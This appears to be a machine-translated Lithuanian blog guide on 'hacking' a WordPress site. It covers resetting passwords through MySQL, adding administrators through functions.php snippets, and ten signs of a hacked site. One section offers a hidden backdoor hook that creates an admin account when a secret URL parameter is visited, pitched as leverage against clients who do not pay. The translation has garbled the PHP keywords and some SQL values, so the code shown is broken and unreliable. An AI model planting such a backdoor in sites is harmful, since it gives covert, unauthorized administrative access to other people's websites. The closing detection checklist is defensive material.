Kaip įsilaužti į „WordPress“ svetainę, pilnas vadovas

Kaip įsilaužti į „WordPress“ svetainę, išsamus vadovas


Mes nesmerkiame, nepatvirtiname ir neskatiname neteisėto ar kenkėjiško elgesio! Šio straipsnio tikslas yra paaiškinti, kaip nulaužti ar atgauti prieigą prie jums priklausančios „WordPress“ svetainės arba kad jūs turite teises redaguoti, administruoti ir pasiekti. Kad ir ką darytumėte, jūs darote tai patys. Mes neatsakome už jūsų veiksmus. Šis vadovas skirtas tik švietimo tikslams.

Apibūdinti metodai padės jums atgauti prieigą prie svetainės, net jei jau neturite paskyros, tačiau jums reikės šiek tiek informacijos apie svetainę ir jie nepadės įsilaužti į bet kokį atsitiktinį „WordPress“ diegimą..

Šiame vadove mes jums parodysime:

  • Kaip įsilaužti į „WordPress“ svetainę
  • Kaip sukurti „WordPress“ užpakalinį duris
  • Kaip sukurti naują vartotojo abonementą per FTP
  • 10 ženklų, kad jūsų „WordPress“ svetainė nulaužta

Kaip įsilaužti į „WordPress“ svetainę, išsamus vadovas

Situacijos, kuriose galite sau padėti

Jei esate vienoje iš šių situacijų, mūsų metodai padės jums atgauti prieigą:

  • pamiršote vartotojo vardą arba el. pašto adresą
  • slaptažodžio nustatymo parinktis neveikia prieglobos serveryje
  • pašto slaptažodžio nustatymo el. pašto adresai neberodomi
  • nebegalite pasiekti paskyros el. pašto adreso
  • žinote vartotojo vardą ir slaptažodį, tačiau derinys tiesiog neveikia

Jei norite naudoti toliau aprašytus metodus, jums reikės tik vienas iš šių:

  • FTP prieiga prie serverio arba
  • cPanel prieiga prie serverio, arba
  • prieiga prie „MySQL“ duomenų bazės ir galimybė prisijungti prie jos nuotoliniu būdu

1 metodas – „MySQL“ būdas

Naudokite šį metodą, jei norite pakeisti esamo vartotojo slaptažodį (arba vartotojo vardą, jei reikia) arba sukurti naują paskyrą. Jums reikės „cPanel“ prieigos arba tiesioginės „MySQL“ prieigos prie svetainės duomenų bazės. Pradėkime pakeisdami esamo vartotojo slaptažodį.

Jei naudojate „cPanel“, prisijunkite („cPanel“ visada galite pasiekti naudodami https://yoursite.com:2083 nuorodą), suraskite ir atidarykite „phpMyAdmin“. Duomenų bazių ir lentelių sąrašas yra kairėje. Jūs ieškote stalo, kuris baigiasi _naudotojai. Tikriausiai bus wp_naudotojai, bet jei serveryje yra įdiegta daugiau nei viena „WordPress“ svetainė, turite rasti tinkamą.

Dešinėje lentelėje bus vartotojas, kurį norite redaguoti. Atlikite tą pačią procedūrą, jei jungiatės prie „MySQL“ per kokį nors išorinį klientą, pvz SQLyog. Kai surasite lentelę ir tikrąjį vartotojo įrašą, laikas pakeisti slaptažodį.

Kaip jau turbūt supratote, slaptažodis išsaugomas aplanke vartotojo_pasas lauke, maišo naudojant MD5 algoritmą. Atidaryk internetinis MD5 generatorius įveskite slaptažodį, kurį norite naudoti, ir spustelėkite „Hash“. Nukopijuokite sukurtą eilutę ir pakeiskite originalų slaptažodį su tuo. „PhpMyAdmin“ galite redaguoti lauką dukart spustelėdami jį. Procedūra yra panaši ir kituose „MySQL“ klientuose. Išsaugokite pakeitimus ir prisijunkite prie „WordPress“ naudodami naują slaptažodį.

WP vartotojų lentelė

Vartotojo vardai, maišyti slaptažodžiai ir el. Pašto adresai saugomi wp_naudotojai duomenų bazės lentelė

Vis dar naudojamas 1 metodas – naujo vartotojo sukūrimas

Naujo vartotojo sukūrimas yra šiek tiek sudėtingesnis, tačiau vis tiek valdomas per mažiau nei minutę. Sukurkite naują įrašą Vartotojų lentelėje ir gyventojų skaičius: vartotojo_loginas, vartotojo_pasas (maišyti naudojant aukščiau aprašytą MD5 funkciją) ir vartotojo_paštas. Visi kiti laukai gali likti tušti; jiems nesvarbu. Išsaugokite naują įrašą. Išsaugojęs „MySQL“ jai suteiks unikalų ID. Tai numeris ID lauke. Atsimink tai.

Dabar eik į _usermeta stalas. Prisiminti, lentelės priešdėlis turi būti toks pat kaip ir vartotojo. Pavyzdžiui wp_naudotojai ir wp_usersmeta. Jei priešdėlis nesutampa, redaguojate neteisingą (kai kurių kitų WP diegimo) lentelę, o nauja paskyra neveiks. Mes sukursime du naujus įrašus. Nepaisykite umeta_id laukas jiems abiem. Rinkinys Vartotojo ID lauką iki vertės, kurią ką tik atsiminėte (nauja ID vertė naudotojų lentelėje). Pirmam įrašų rinkiniui meta_key į wpct_user_level ir meta_value į 10. Dėl antrojo meta_key į wpct_capacities ir meta_value į a: 1: {s: 13: "administratorius"; b: 1;}. Išsaugokite abu. Baigta – prisijunkite!

2 metodas – function.php būdas

Šis metodas gali būti panaudotas redaguojant function.php per cPanel arba naudojant FTP klientą. Jei naudojate „cPanel“, raskite failų tvarkyklę ir atidarykite ją. Pirmiausia turime rasti aktyvios temos aplanką.

Eiti į „public_html“ / „wp_content“ / temos aplankas. Jei iš karto pamatysite savo temą ir žinote, kuri ji yra – puiku. Atidarykite jo aplanką ir pradėkite redaguoti funkcijos.php. Jei ne, atidarykite svetainę, dešiniuoju pelės mygtuku spustelėkite bet kurioje vietoje, pasirinkite „Žiūrėti šaltinį“. Tada paspauskite Ctrl + F ir pradėkite rašyti / temos / netrukus turėsite paryškinti daugybę URL ir atpažinsite aktyvios temos aplanko pavadinimą.

Suraskite jį failų struktūroje, atidarykite ir pradėkite redaguoti funkcijos.php. Nukopijuokite / įklijuokite šį kodą failo pabaigoje. Nepamiršk uždaryti ?> PHP žymės, jei jas turite. Jie turi būti paskutinėje eilutėje. Taigi įdėkite kodą prieš juos.

$ new_user_email = '[email protected]';
$ new_user_password = '12345';

if (! vartotojo vardas egzistuoja ($ new_user_email)) {
$ user_id = wp_create_user ($ new_user_email, $ new_user_password, $ new_user_email);

wp_update_user (masyvas ('ID' => $ user_id; 'slapyvardis' => $ new_user_email));

$ vartotojas = naujas WP_User ($ user_id);
$ user-> set_role ('administratorius');
}

Redaguokite tik pirmąsias dvi kodo eilutes, kad jos atspindėtų jūsų naują sąskaitą. Jei WP jau yra vartotojas, turintis tą el. Laišką, nauja paskyra nebus sukurta, todėl įsitikinkite, kad ji yra nauja. Pakeiskite ir slaptažodį – nesinervinkite dėl scenarijaus vaikų. Išsaugoję failą tiesiog atidarykite savo svetainę, bus paleistas kodas, sukurta nauja sąskaita su administratoriaus teisėmis ir galėsite prisijungti prie jos.

Tai atlikę, nepamirškite ištrinti kodo iš funkcijos.php.

Kiti įsilaužimo būdai

Žinodami FTP, „cPanel“ arba „MySQL“ slaptažodžius, įrodysite, kad turite teisėtą prieigą prie serverio, todėl turite turėti prieigą ir prie „WordPress“ diegimo (-ų). Jei neturite nė vienos iš tų paskyrų, jums nieko blogo (įsilaužimas į kitų žmonių svetaines), ir tai nėra malonu!

Atminkite, kad neteisėtos prieigos prie bet kurių kompiuterių, svetainių ar serverių įgijimas yra sunkus nusikaltimas ir greitai sprendžiamas daugelyje šalių.

Jei bijote, kad jūsų „WordPress“ svetainė gali būti nulaužta, patikrinkite šį puslapį naudodami nemokamą „WordPress“ saugos skaitytuvą. Jei neturite laiko nustatyti savo tinklaraščio, leiskite mums tai padaryti už jus.

Kaip sukurti „WordPress“ užpakalinį duris

Kai priekinės durys yra uždarytos, galite išbandyti galines duris. Tai gali atrodyti kaip kenksmingas būdas naudoti kodą norint patekti į svetainę neturint prieigos prie jos, tačiau iš tikrųjų yra atvejų, kai jums reikia valdyti savo svetainę, jei ją kažkas pavogė..

Jei jis kuria tinklalapius kitiems žmonėms to, ką jūs darote, anksčiau ar vėliau atsiras klientas, kuris atsisako jums mokėti už jūsų darbą; klientas, kuris ištrins jūsų prisijungimo duomenis ir perims viską, ką padarėte. Kartais užteks sukurti naują vartotoją per FTP arba iš naujo nustatyti slaptažodį. Kai to nepakanka, galbūt norėsite nugirsti savo kelią atgal arba sukurti prieigą prie administratoriaus puslapių.

Bet jei nusprendėte paslėpti nedidelį kodo fragmentą savo „WordPress“ aplinkoje, galite sau sutaupyti šiek tiek orumo ir gauti prieigą prie „WordPress“ svetainės su administratoriaus teisėmis. Štai kur prasideda žaidimai.

Nesvarbu, kiek kartų šis vagis ištrina jūsų informaciją arba atkuria atsarginę kopiją serveryje, kuriam jis greičiausiai priklauso, yra tikimybė, kad jis nieko nežino apie įėjimus į galinius duris. Jei jis tai padarytų, jam tikriausiai net nereikėtų jūsų pagalbos nustatant „WordPress“, tiesa?

Sukurkite galinį duris:

Gerai, pakanka pokalbio; štai kodas, kurio jums reikės norint atlikti darbą:

  1. Atidarykite function.php failą
  2. Nukopijuokite / įklijuokite šį kodą:
  3. add_action ('wp_head', 'wploop_backdoor');
    funkcija wploop_backdoor () {
    Jei ($ _GET ['backdoor'] == 'knockknock') {
    reikalauti ('wp apima / registracija.php');
    If (! Username_exists ('username')) {
    $ user_id = wp_create_user ('vardas', 'leidimas');
    $ vartotojas = naujas WP_User ($ user_id);
    $ user-> set_role ('administratorius');
    }
    }
    }
    ?>
  4. Išsaugoti pakeitimus

Jei paliksite kodą tokį, koks yra, viskas, ką turėtumėte padaryti norėdami sukurti naują administratorių svetainėje, yra apsilankymas http://www.savasdomenas.com/?backdoor=knockknock

Įkėlus puslapį, jūsų naujasis vartotojo vardas yra “vardas” ir slaptažodį „Praeiti“.

Žinoma, kodą galite pakeisti aukščiau pakeisdami „name“ ir „pass“ į ką tik nori. Taip pat galite pakeisti nuorodą į savo galines duris, pakeisdami „galinius duris“ ir (arba) „beldžiasi“ į bet ką, ką sugalvojote..

Išbandykite šią funkciją – ji ne tik smagi, bet ir gali tikrai padėti kada nors ateityje, kai ketinate sukurti svetainę tam, kuo negalite visiškai pasitikėti. Taip pat turėtumėte išlyginti savo „WordPress“ ir tinklaraščių rašymo įgūdžius.

Kaip sukurti naują vartotojo abonementą per FTP

Sukurti naujas vartotojo abonementus „WordPress“ yra labai paprasta. Kaip administratorius, jūs turite eikite į Vartotojų administratoriaus puslapį kur galite sukurti naują bet kurio vartotojo vaidmens paskyrą. Tai gali būti padaryta per kelias sekundes, o naujai sukurtas vartotojas gali iš karto prisijungti naudodamas vartotojo vardą ir slaptažodį.

Bet kas atsitiks, jei prarasite prieigą prie savo „WordPress“ administratoriaus? Viskas gali būti šiek tiek sudėtingesnė, tačiau nesijaudinkite – turime jums funkciją, kuri gali išgelbėti jūsų administratoriaus gyvenimą.

Ar kitas administratorius ištrynė jūsų sąskaitą, ar per klaidą ištrynėte visus vartotojus iš duomenų bazės, panaudojote netinkamai veikiantį papildinį ar įsilaužėte, vis tiek galite vėl valdyti. Kartais jums gali būti suteikta prieiga tik prie savo FTP serverio, o HTTP nebus prieinamas ir turėsite sukurti naują administratorių. Nors tai gali būti retas atvejis, ši funkcija jus sutaupys.

Norėdami sukurti naują sąskaitą ne „WordPress“ administratoriaus aplinkoje, viskas, ko jums reikės, yra FTP prieiga prie jūsų svetainės. Kaip administratorius, jūs turėtumėte visą reikalingą informaciją, kad galėtumėte prisijungti prie savo serverio, ir galite greitai sukurti naują paskyrą sukurdami naują funkciją savo temoje..

Sukurkite naują vartotojo abonementą per FTP:

  1. Atidarykite FTP klientą ir prisijunkite prie savo paskyros
  2. Eikite į wp-turinį / temas
  3. Atidarykite naudojamos temos aplanką
  4. Ieškokite failo function.php ir redaguokite jį
  5. Nukopijuokite ir įklijuokite šią funkciją:
  6. funkcija admin_account () {
    $ user = 'Vartotojo vardas';
    $ pass = 'Slaptažodis';
    $ email = '[email protected]';
    if (! username_exists ($ user) &&! email_exists ($ email)) {
    $ user_id = wp_create_user ($ user, $ pass, $ email);
    $ vartotojas = naujas WP_User ($ user_id);
    $ user-> set_role ('administratorius');
    }}
    add_action ('init', 'admin_account');
    
  7. Pakeiskite vartotojo vardą, slaptažodį ir el. Pašto adresą į ką nors unikalaus
  8. Išsaugoti pakeitimus

Įsitikinkite, kad vartotojo vardas, slaptažodis ir el. Pašto adresas, kuriuos nustatėte funkcijoje, yra unikalūs ar kitaip funkcija neveiks tinkamai. Išsaugoję pakeitimus būsite baigę ir galėsite pereiti į savo WP prisijungimo skydelį. Norėdami prisijungti, naudokite naują informaciją. Patvirtinę abonementą, funkciją galite ištrinti iš failo function.php.

Aukščiau parodyta funkcija sukuria administratoriaus abonementą, bet jūs galite lengvai jį modifikuoti, kad sukurtumėte abonementą su bet kuriuo kitu vartotojo vaidmeniu. Tiesiog pakeisti vaidmenį 8tūkst eilė kodą redaktoriui, autoriui, bendraautoriui, prenumeratoriui ar bet kuriam kitam jūsų sukurtam vartotojo vaidmeniui.

Deja, jei pametėte savo administratoriaus sąskaitą, praradote ir visus žinutes, parašytas tuo vartotojo vardu. Štai kodėl jūs visada turėtumėte atsarginę kopiją, kurią galite lengvai gauti. Jei skaitote tai turėdami savo administratoriaus paskyrą, imkite tai kaip priminimą, kad nedelsdami sukurtumėte atsarginę kopiją ir pažymėkite šį straipsnį tik tuo atveju, jei ateityje turėsite sukurti sąskaitą ne „WordPress“.

10 ženklų, kad jūsų „WordPress“ svetainė nulaužta

„WordPress“ yra didžiulė tinklaraščių platforma. Yra milijonai vartotojų ir atrodo, kad jų skaičius sparčiai auga kiekvieną dieną. Žmonės netgi linkę perkelti savo svetaines, sukurtas kitose turinio valdymo sistemose, į šią atvirojo kodo sistemą dažniau, nei jūs galite pamanyti. Ir nors tai yra gerai, tai reiškia Įsilaužėliai taip pat pateiks „WordPress“ į svarbiausią vietą, kai bandys įsibrauti į atsitiktines svetaines.

Paprastai, jei įsilaužsi, apie tai sužinosite iškart. Jūsų svetainė taps neprieinama; negalėsite prisijungti, o kartais įsilaužėlis net paliks pranešimą pirmame puslapyje. Bet dažniau nei ne, galbūt net nepastebėsite, kad kažkas pasikeitė. Šioje straipsnio dalyje mes jums parodysime kelis ženklus, kurie gali parodyti, kad jūsų „WordPress“ svetainė buvo nulaužta, ir kelis problemos sprendimus.

1. Nesėkmingas prisijungimas

Šis ženklas yra beveik akivaizdus. Jei kurį laiką naudojote naudotojo vardo ir slaptažodžio derinį, niekada nekildami problemų, galite kilti įtarimų, jei staiga „WordPress“ neatpažįsta jūsų paskyros. Jei įsilaužėlis turėjo prisijungti prie jūsų svetainės, yra tikimybė, kad jis greitai pakeis jūsų administratoriaus teises.

Galbūt jis turėjo pakeisti jūsų slaptažodį arba visiškai ištrinti jūsų sąskaitą. Prieš pradėdami panikuoti po to, kai pirmą kartą „WordPress“ praneša jums apie neteisingą vartotojo vardą / slaptažodį, atkreipkite dėmesį į tai, ar galbūt įvedėte neteisingą derinį arba įjungėte didžiosios raidės užrakto mygtuką.

Sprendimas: Pabandykite atkurti slaptažodį el. Paštu arba naudokite kitą sąskaitą prisijungdami. Norėdami įsitikinti, kad prisijungimas yra saugus, rekomenduojame įdiegti Prisijungimas Ninja „WordPress“ papildinys.

2. Į jūsų svetainę pridedamas kenksmingas turinys

Svetainėje yra įspėjimas apie kenkėjiškas programas

Jei pastebėsite nepažįstamą turinį savo svetainėje, galite pradėti nerimauti. Kai jie turės galimybę patekti į jūsų administratoriaus sritį, įsilaužėliai galės pakeisti jūsų branduolį ir jūsų temos, ir papildinių failus. Tai reiškia, kad jie gali pakeisti bet ką, ko nori.

Kai kurie įsilaužėliai smarkiai pakeis jūsų svetainės išvaizdą ir galbūt net paaiškins, kad jūs įsilaužėte, kiti bus apie tai daug subtiliau..

Sprendimas: Pabandykite svetainės kode ieškoti paslėpto turinio. Gali būti nuorodų į kenksmingų svetainių įsilaužėlius, pasodintus į jūsų svetainės poraštę, arba jie gali būti įdiegę iššokančius langus, kurie reguliariai atsidarys jūsų klientams. Norėdami nuskaityti savo svetainę arba nuolat stebėti, ar nėra tokių problemų, naudokite „Ninja“.

3. Įtartini vizitai

Jei nestebite savo svetainės, turėtumėte pradėti tai daryti nedelsdami. Paprastas būdas tai padaryti yra naudoti „Google Analytics“, kuri, be daugelio kitų funkcijų, gali pasakyti, kiek apsilankymų sulaukiate ir kur yra tie apsilankymai. Po kurio laiko jūs susipažinsite su savo svetaine. Tai reiškia, kad jūs žinosite, iš kur vyksta apsilankymai, sužinosite, kai pradėsite naują kampaniją ir kada bus naujų reklaminių nuorodų, išleistų gamtoje..

Bet jei staiga pastebite, kad jūsų svetainė sulaukia daugybės naujų apsilankymų iš įtartino domeno, norėsite tai ištirti toliau, nes jūsų svetainė gali būti tiesiog nulaužta. Paprastai tokio tipo apsilankymai atmeta 100% atmetimo procentą, tai reiškia, kad buvo pasiektas tik vienas puslapis. Piratai dažnai naudos automatizuotas sistemas, kurios pateks į kitas jūsų blogas svetaines. Nesvarbu, ar netinkamas kodas vykdomas jūsų svetainėje, ar jūs tapote šlamšto tinklo dalimi, viskas gali pasidaryti rimta, todėl turėsite patikrinti, ar svetainėje nėra kenksmingo kodo.

Sprendimas: Naudokite „Google“ žiniatinklio valdytojų įrankiai rasti įtartinus domenus

4. Staigus eismo sumažėjimas

Saugus naršymas Svetainės būsena

Skirtingai nei paskutinis paminėtas įsilaužimo požymis, šis gali jus įspėti, nes staiga sumažėja apsilankymų skaičius. Užuot kreipęsi į naujus vizitus, įsilaužėlis gali siųsti apsilankymus ne jūsų svetainėje. Taip gali nutikti, nes įsilaužėlis nukreipė jūsų svetainę į kitą. Kita priežastis, dėl kurios sumažėja lankytojų, yra ta, kad „Google“ įtraukė į jūsų svetainę juodąjį sąrašą. Šis veiksmas parodys pranešimą kiekvienam vartotojui, kuris gali pasirinkti neatidaryti jūsų svetainės, nes ji užkrėsta.

Sprendimas: Naudokite „Google“ Saugaus naršymo svetainės būsena norėdami patikrinti, ar jūsų svetainė pažymėta kaip nesaugi ir ar joje šiuo metu nėra pavojinga lankytis.

5. Paieškos sistemų rezultatai yra keistai

Jei nepastebėjote jokių pakeitimų savo svetainėje, tačiau sužinojote, kad paieškos rezultatai „Google“ ir kitose paieškos sistemose yra keista (rodomi skirtingi pavadinimai ir kiti metaduomenys), tai gali būti aiškus nulaužtos svetainės požymis. Hakeris galėjo pakeisti jūsų turinį taip, kad jį galėtų pamatyti tik ekspertas. Vis dėlto pokytis bus matomas paieškos sistemos rezultatuose.

Sprendimas: Patikrinkite savo svetainę su „Google“ žiniatinklio valdytojų įrankiai, ir patikrinkite, ar į jūsų svetainę nebuvo įsilaužta nemokamas internetinis įrankis.

6. Negalite siųsti ar gauti el. Laiškų

Kai įsilaužėlis pateks į jūsų svetainę, jis greičiausiai to norės naudokite savo serverį šlamšdami visus kitus. Kai sužinosite, kad negalite siųsti ar gauti naujų el. Laiškų iš „WordPress“, tai gali būti aiškus ženklas, kad buvote nulaužtas. Dar kartą patikrinkite savo el. Paštą, tada pasiteiraukite savo tiekėjo, kad įsitikintumėte, ar nėra klaidų.

Sprendimas: Išbandykite savo „WordPress“ pašto funkcija naudojant šį nemokamą papildinį.

7. Svetainės nėra

Serveris nerastas

Kartais gali būti, kad įsilaužėliai nepateks į jūsų svetainę, norėdami pasodinti kenkėjišką kodą, peradresuoti vartotojus ar naudoti jūsų el. Pašto adresą šlamštui. Kartais, viskas, ką jie norės padaryti, yra strigti jūsų svetainę. Retai kada įsilaužėlis sėkmingai ištrins viską iš viso serverio. Štai kodėl svarbu saugoti failus garsioje prieglobos įmonėje, kuri pasirūpins saugumu ir taip pat kasdien ar bent kas savaitę saugotų jūsų svetainės atsargines kopijas. Tai gera praktika, kad jūs taip pat retkarčiais darote savo atsargines kopijas, kad svetainę būtų galima greitai atkurti.

Sprendimas: Įdiekite vieną iš geriausių „WordPress“ atsarginių kopijų tvarkymo priedų.

8. Įtartini failai

Panašus į kenksmingą turinį, kuris gali būti pridėtas prie esamų failų, įsilaužėlis gali pasodinti papildomų failų bet kurioje šakninio aplanko vietoje. Pravartu žinoti savo kelią aplink „WordPress“, tačiau jei dar nesate toks patyręs, turėtumėte turėti saugos įrankį, kuris galėtų patikrinti visus jūsų failus ir veiklą. Neseniai apžvelgėme „Security Ninja“, kuris yra puikus įrankis tikrinti visus jūsų „WordPress“ failus.

Sprendimas: Pabandykite ieškoti failų, kurie nepriklauso jūsų „WordPress“ diegimui. Naudokite „Security Ninja“, kad reguliariai nuskaitytumėte savo svetainę ir automatiškai rastumėte tuos failus. Tada ištrinkite failus arba pašalinkite kenksmingą kodą iš užkrėstų failų. Nepamirškite „Ninja“ pagrindinio skaitytuvo priedo.

9. Nauji nariai

Priklausomai nuo jūsų svetainės, galbūt jūs vienintelis galėsite pridėti naujų narių. Tokiu atveju el. Laiškas, kuriame pranešama apie naujai registruotus vartotojus, gali suaktyvinti aliarmą. Jei yra kitų administratorių, turinčių galimybę pridėti naujų narių, pasitarkite su jais apie įtartiną veiklą.

Sprendimas: Pakeiskite prisijungimo URL naudodami nemokamą papildinį, apribokite prieigą prie „WordPress“ prisijungimo puslapio naudodami .htpasswd failą ir naudokite „Login Ninja“, kad visą laiką apsaugotumėte prisijungimo formą..

10. Peržiūrėkite suplanuotus įvykius savo serveryje

Kartais įsilaužėlis nepadarys nieko jūsų svetainei, kai tik atsidurs. Vietoj to, jie paliks suplanuotus renginius o tai gali pakenkti jūsų svetainei ateityje. Ši technika yra pavojinga, nes įsilaužėlis gali nepatyrusią auką iš pradžių palikti be proto. Galite būti užkrėsti ir nieko apie tai nežinote.

Sprendimas: Patikrinkite CRON užduotis jūsų naudojamame serveryje ir įsitikinkite, kad nėra įtartinų suplanuotų užduočių.

Apvyniokite

Tikimės, kad šis straipsnis padės jums valdyti net saugesnę „WordPress“ svetainę ir padės atgauti prieigą prie jos esant blogai situacijai. Ir net jei jūsų svetainė švari, nelaikykite to savaime suprantamu dalyku.
Visada įsitikinkite, kad jūsų tinklaraštis yra kuo saugesnis. Siūlome „WordPress“ saugos papildinius, kurie gali sutaupyti daugiausiai laiko. Vis dėlto nesinaudokite nesaugiu slaptažodžiu ir būkite atsargūs įsilauždami į savo „WordPress“ svetainę.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map